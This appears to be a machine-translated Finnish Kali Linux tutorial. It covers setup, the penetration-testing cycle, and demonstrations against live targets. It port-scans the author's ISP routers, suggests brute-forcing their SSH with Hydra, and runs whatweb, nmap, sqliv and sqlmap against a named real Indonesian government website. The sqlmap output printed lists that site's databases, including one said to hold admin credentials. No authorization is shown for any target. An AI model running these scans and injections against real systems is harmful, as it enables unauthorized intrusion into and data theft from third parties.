Kali Linux -opetusohjelma

Kali Linux Tutorial



Jos olet asiantuntija tai ainakin tuntee Linuxin, komennot ja ympäristön, juuri asentanut Kali Linuxin koneellesi, halunnut tulla Kali Linuxin päälliköksi tai eettiseksi hakkeriksi, olet oikeassa paikassa. Tässä artikkelissa käsitellään Kali Linux -opetusohjelmaa Linux -käyttäjille, jotka eivät ole jo tutustuneet Kaliin, ja pääsen alkuun joistakin hakkerointiin ja turvallisuustestaukseen perustekniikoista Kalin käytön aikana.

Mikä on Kali Linux?

Kali Linux, ( julkaistu ensimmäisen kerran 13. maaliskuuta 2013 ), joka tunnettiin virallisesti nimellä BackTrack, jonka on kehittänyt turvallisuusyritys Offensive Security, on rikostekninen ja turvallisuuteen keskittynyt jakelu, joka perustuu Debianin testaushaaraan. Kali Linux on suunniteltu tunkeutumisen testaamiseen, tietojen palauttamiseen ja uhkien havaitsemiseen. Hanke siirtyi aiemmin tänä vuonna julkaistavaan julkaisumalliin, jotta jakelun käyttäjille voitaisiin tarjota ajan tasalla olevia tietoturva -apuohjelmia. Kali Linux on ilmainen ja tulee aina olemaan. Se sisältää 600+ tunkeutumistestityökalua.







Miksi Kali Linux? Onko se oikea sinulle?

Kali Linux on saanut viime aikoina paljon suosiota. Ja sen takana on syy. Hakkerointi on palannut populaarikulttuurin viileänä tehtävänä, ja tämä johtuu merkittävästi TV-sarjasta Mr. Robot. Robotin suosio auttoi Kali Linuxia saamaan uusia käyttäjiä. Ihmiset, joilla ei juurikaan ole tietoa Linuxista tai mistään tietoturvaan liittyvästä, yrittävät nyt käyttää Kalia pääasiallisena Linux -jakelunaan.



Kehittynein tunkeutumistestausjakelumme, koskaan. - Kali Linux -kehittäjät. (Se on kirjoitettu Kali.orgin pääsivulle sivun yläreunaan.) Mitä saat tästä lausunnosta? Huomaatko tämän: APTD (Advanced Penetration Testing Distribution)? Täällä ei ole termiä hakkerointi kirjaimellisesti. Kali Linux on sama kuin muut Linux -jakelut. Yksinkertaisesti sanottuna, se on Linux-jakelu, joka on täynnä turvallisuuteen liittyviä työkaluja ja joka on suunnattu verkko- ja tietoturva-asiantuntijoille. Kali Linuxin käyttö keskittyy kuitenkin vain turvallisuuteen ja oikeuslääketieteeseen.



Linux -jakelu on vain paketti, joka sisältää Linux -ytimen, joukon ydinapuohjelmia ja -sovelluksia sekä joitain oletusasetuksia. Joten Kali Linux ei tarjoa jotain ainutlaatuista siinä mielessä, että suurin osa tarjotuista työkaluista voidaan asentaa mihin tahansa Linux -jakeluun.





Kali Linux on erityisesti suunniteltu täyttämään ammattimaisen tunkeutumistestauksen ja tietoturvatarkastuksen vaatimukset. Se on suunnattu tietylle Linux -käyttäjien alaryhmälle. Pentesters, hakkerit jne. Ei ole suositeltava jakelu, jos odotat Kalia yleiskäyttöiseen Linux-työpöytään kehittämiseen, web-suunnitteluun, pelaamiseen, toimistoon jne. Kali saattaa antaa sinulle haasteita, vaikka olisit kokenut Linux-käyttäjä .

ASIAT KALI LINUXIN ASENTAMISEN JÄLKEEN

Kali Linuxin asentamisen jälkeen saatat ihmetellä, mitä tehdä seuraavaksi, eikö? Kaikki kohtaavat tämän ongelman, älä huoli.



VAIHE 1: MÄÄRITÄ TIEDOSTO

Ensinnäkin saatat jo tietää tämän, mutta on tärkeää asettaa arkisto oikein. Kuten sanoin, Kali Linuxin liikkuvan julkaisun malli pyrkii tarjoamaan ajantasaisia ​​tietoturva -apuohjelmia jakelun käyttäjille. Yleensä, jos sinulla on juuri asennettu Kali Linux, arkisto viittaa asennukseen käyttämääsi tietovälineeseen. Tämän korjaamiseksi sinun on vaihdettava arkisto viralliseksi Kali Linux -varastoksi. Tarvittava tiedosto sijaitsee alla /etc/apt/sources.list . Avaa tiedosto leafpad -tekstieditorilla ja korvaa oletusvarasto tähän viralliseen Kali Rolling -varastoon:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

VAIHE 2: KALI LINUXIN PÄIVITTÄMINEN JA PÄIVITTÄMINEN

Päivitä ja päivitä järjestelmäsi, synkronoi Kali Linux uusimpaan versioon. Voit tehdä tämän avaamalla päätelaitteen ja kirjoittamalla:

apt update -y && apt upgrade -y && apt dist-upgrade 

Apt update -komento lataa ja hakee pakettiluettelot tiedot arkistoista ja päivittää ne saadakseen tietoa uusimmista pakettiversioista ja niiden riippuvuuksista.

Apt upgrade -komento lataa ja asentaa uudemman version asennetuista Kali Linux -paketeista, kunhan siinä ei ole virheitä riippuvuuksista.

Apt dist-upgrade päivittää kaikki paketit uusimpaan saatavilla olevaan versioon. Lisäksi asenna ja poista riippuvuudet tarpeen mukaan (asenna riippuvuudet tietysti pakettien tyydyttämiseksi, mutta poista myös orvot, jos päivitetty paketti ei enää tarvitse riippuvuutta.

KALI LINUXIN PERUSLÄHETYKSEN TESTAUSKONSEPTI

Kun olet suorittanut nämä vaiheet onnistuneesti, voit tehdä Kali Linuxilla kolme tärkeintä asiaa kohdennetun järjestelmän perusteella, mukaan lukien:

  1. Langattoman verkon hakkerointi - Wifi -hakkerointi, tietojenkalastelu, ARP -myrkytys jne.
  2. Verkkosovellusten hakkerointi -SQL-injektio, sivustojen välinen pyynnön väärentäminen (CSRF), Web Phising jne.
  3. Laite hakkerointi - Hyödynnä kohdekonetta hallitaksesi sitä.

En sisälly IoT -hakkerointiin, se ei tarkoita, että Kali Linuxilla ei olisi kykyä tähän tarkoitukseen. Mutta kirjaimellisesti se voi kuulua myös laitehakkerointiin. Koska laitteella on fyysinen ulkonäkö ja muoto. Tässä opetusohjelmassa käsitin niiden perustiedot. Koska Kali Linux on valtava, se ei mahdu yhteen artikkeliin!

Sinun on myös tiedettävä tunkeutumissykli tai -menettely. He ovat:

  1. Tiedustelu - Tiedonkeruu
  2. Skannaus
  3. Operaatio
  4. Hyödyntämisen jälkeinen

LANGATTOMAN VERKON TEKEMINEN KALI LINUXIN KANSSA

Langattoman verkon hakkeroinnin osalta uhri voi vaihdella. Koska langattomat verkot koostuvat useista asioista, kuten ISP (Internet -palveluntarjoaja), reititin ja sen kumppanit (modeemi, keskitin, kytkin jne.) Ja asiakkaat (käyttäjät, CCTV, etätietokone jne.). Heillä on myös haavoittuvia mahdollisuuksia.

Internet on laaja ja monimutkainen yhdistelmä verkkolaitteistoja, jotka on yhdistetty yhdyskäytävillä. Pakettien kulkeman reitin seuraaminen on tärkeää tietääksesi, miten saavutat tietyn isäntänimen tai kohde -IP -osoitteen.

Kali Linuxissa on sisäänrakennettu työkalu nimeltä Traceroute. Traceroute käyttää IP -protokollan aikaa elää kenttä ja yrittää saada ICMP TIME_EXCEEDED vastauksen kustakin yhdyskäytävästä jollekin isännälle. Traceroute yrittää jäljittää reitin, jonka IP -paketti seuraisi jollekin Internet -isännälle, käynnistämällä koetinpaketit, joissa on pieni TTL (aika elää), ja kuuntelemalla ICMP -ajan ylittynyt vastaus yhdyskäytävästä. Annan sinulle ja esimerkin siitä, miten jäljittää Internet -palveluntarjoajan reititin, jota käytetään yhteyden käsittelemiseen Tracerouten avulla.

1. Tunnustus

Tietojen kerääminen on tärkein alku, älä missaa tätä vaihetta. Tässä vaiheessa tarkoituksemme on saada mahdollisimman paljon hyödyllistä tietoa, jota voimme saada, ja sitten näitä tietoja käytetään jatkotoimiin.

Avaa ensin päätelaite ja kirjoita tämä komento, jotta voit alkaa seurata tietä sivustoon, tässä tapauksessa asetan sivuston osoitteeseen google.com.

traceroute google.com 

Tracerouten kuvakaappaus

2. Skannaus

Kun olemme käynnistäneet komennot, se luettelee, missä paketti kulkee järjestyksessä. Kuten yllä näet, minulla on 3 humalaa, joista yksi on ISP -palvelimeni. Ensimmäinen luettelossa oleva IP on reitittimeni, joka toimii yhdyskäytävänä. Ja seuraavat kaksi kuuluvat Internet -palveluntarjoajani. Tarkistetaan nyt palvelu, jota he käyttävät Nmapin avulla. Joten kohteet, joita aiomme skannata, ovat 10.152.192.1 ja 10.13.223.102 . Terminaalissa suoritin seuraavan komennon:

nmap -v -sS [IP Target] -Pn 

Hajotetaan komennon argumentti:

-v = Ota puhetila käyttöön

-sS = Käytä TCP SYN -skannaustekniikkaa

-Pn = Käsittele kaikkia isäntiä verkossa -ohita isäntätutkimus

Ja tässä on tulos, jonka saimme.

nmap -kuvakaappaus 2

Valitettavasti kaikki portit käytössä 10.152.192.1 suodatetaan, se tarkoittaa, että IDS tai palomuuri estävät kaikki saapuvat TCP -yhteydet tällä IP -osoitteella. Otetaan nyt toinen skannaus toiseen kohteeseen.

nmap -kuvakaappaus 1

3. Käyttö

Tässä menettelyssä minun ei ole tarkoitus suorittaa todellista hyväksikäyttöä, vaan näytän sinulle kuinka. Yllä olevan Nmap -skannaustuloksen perusteella tiedämme, että tällä IP -osoitteella on SSH -palvelin käynnissä portissa 22 ja se on auki. Se on avoin raa'alle voimalle, haha! Löysimme reiän, tämä SSH -palvelin on mahdollinen reikä, johon voimme yrittää päästä. Kali Linuxissa on useita työkaluja, jotka tukevat bruteforce- tai sanakirjahyökkäyksiä SSH -protokollaa vastaan. Suosituin ja tehokkain on Hydra.

Ok, tämä oli perusmenettely tunkeutumistestin suorittamiseksi kohdennettua palvelinta vastaan, joka tässä esimerkissä on minun ISP -palvelimeni.

Kotisivu

Itse asiassa, jos suhtaudut intohimoisesti tähän, voit määrittää hakkerointiympäristön asentamalla DWVA: n (Damn Vulnerable Web App) Kali Linuxiin. Se on PHP/MySQL -verkkosovellus, jossa on joukko haavoittuvia reikiä. Sen päätavoitteena on olla apuna turvallisuusammattilaisille, jotta he voivat testata taitojaan ja työkalujaan oikeudellisessa ympäristössä, ja auttaa web -kehittäjiä ymmärtämään paremmin verkkosovellusten suojausprosesseja. Voit saada DWVA: n ilmaiseksi Githubista täältä: https://github.com/ethicalhack3r/DVWA.

Toistaiseksi näytän sinulle, kuinka Web -sovellusten hakkerointi tehdään oikealla sivustolla. Mutta lupaa minulle, että se rajoittuu vain opetustarkoituksiin. Simuloimme todellista hyökkäystä oikealle sivustolle SQL -injektion avulla.

Edellytys

Työkalut:

-Whatweb (esiasennettu)

-Nmap (esiasennettu)

- SQLiv (asenna manuaalisesti)

-SQLMap (esiasennettu)

Tarvitsemme vielä yhden lisätyökalun, joka on saatavana Githubista täältä: https://github.com/Hadesy2k/sqliv, asenna se ensin Kali Linuxiin. Tämä työkalu nimeltä SQLiv, joka pystyy suorittamaan kohdennetun skannauksen tarjoamalla tietyn verkkotunnuksen (indeksoimalla). Kirjoita terminaali:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Kohde: www.trenggalekkab.go.id

1. Tunnustus

Kerää mahdollisimman paljon hyödyllistä tietoa. Voisimme avata verkkosivun ja havaita, mikä sovellus toimii tällä sivustolla. Tarkista ensin, millainen sivusto se on. Käytämme mitä verkkoa siihen.

whatweb www.trenggalekkab.go.id 

Mikä Web -kuvakaappaus

Kuten yllä olevasta tuloksesta näet, kohde sijaitsee Indonesiassa. Se on käynnissä Apache v2.2.27 sen verkkopalvelimella ja on myös PHP v5.4.31 , sillä on IP -osoite 103.247.21.142 . Okei, merkitse se muistiin. Saatat joutua vierailemaan sen verkkosivulla etsimään rakennettua tiedostoa tai sivua, URL -parametreja tai jopa kirjautumislomaketta. Tarvitsemme toistaiseksi kyseisen IP -osoitteen seuraavaan skannausvaiheeseen.

2. Skannaus

Kuten ennenkin, käytämme Nmap -ohjelmaa uudelleen tarkistaaksemme, mitkä portit ja palvelut toimivat kohteella.

nmap -v -sS 103.247.21.142 

Ja tässä on tulos, jonka saimme:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

On joukko avoimia portteja, jotka käsittelevät jokaista kohteen palvelua, mutta huomiota herättävä on mysql-palvelu portissa 3306. On ilmoitettu, että tämä sivusto käyttää mysql hallita tietojaan tietokannoissa. Sitten ihmettelen, onko tällä sivustolla SQL -injektion haavoittuvuuksia. Joten skannaan sivuston uudelleen käyttämällä juuri asennettua SQLiviä. Kirjoitin komennon:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot 1

Löysimme 2 mahdollista SQL -haavoittuvaa URL -osoitetta tältä sivustolta. Muista nämä URL -osoitteet.

3. Käyttö

OK, meillä on SQL -haavoittuvia URL -osoitteita ja valmiita suoritettavaksi. Tätä varten käytämme SQLMapia. Syntaksi on:

sqlmap [Vulnerable URL] --dbs 

Komennon pitäisi näyttää tältä:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

-Dbs -argumentti on kertoa SQLMapille, että se hankkii kohdetietokannat. Tässä on tulos, jonka saimme:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap löysi kaksi tietokantaa, mutta vain yhden niistä, jotka sisältävät arkaluonteisia tietoja, kuten järjestelmänvalvojan käyttäjätilin. Se on trengkab_trg. Kun olemme löytäneet tietokannat, meidän on vielä tehtävä toinen vaihe. Tämä tarkoittaa taulukoiden ja sarakkeiden löytämistä ja viimeinen vaihe on tietojen tyhjentäminen. En näytä sinulle kuinka tässä osiossa, käyttämällä tätä kohdetta. Ainakin tiedät hyökkäysjakson perusidean ja joidenkin työkalujen käytön.

LAITTEIDEN HAKKEROINTI

Tämän sivuston tulevassa artikkelissa käsittelemme laitteiden hakkerointia, pysy kuulolla. Ennakkovaroituksena haluat varmistaa, että tiedät jonkin Pythonin tätä varten.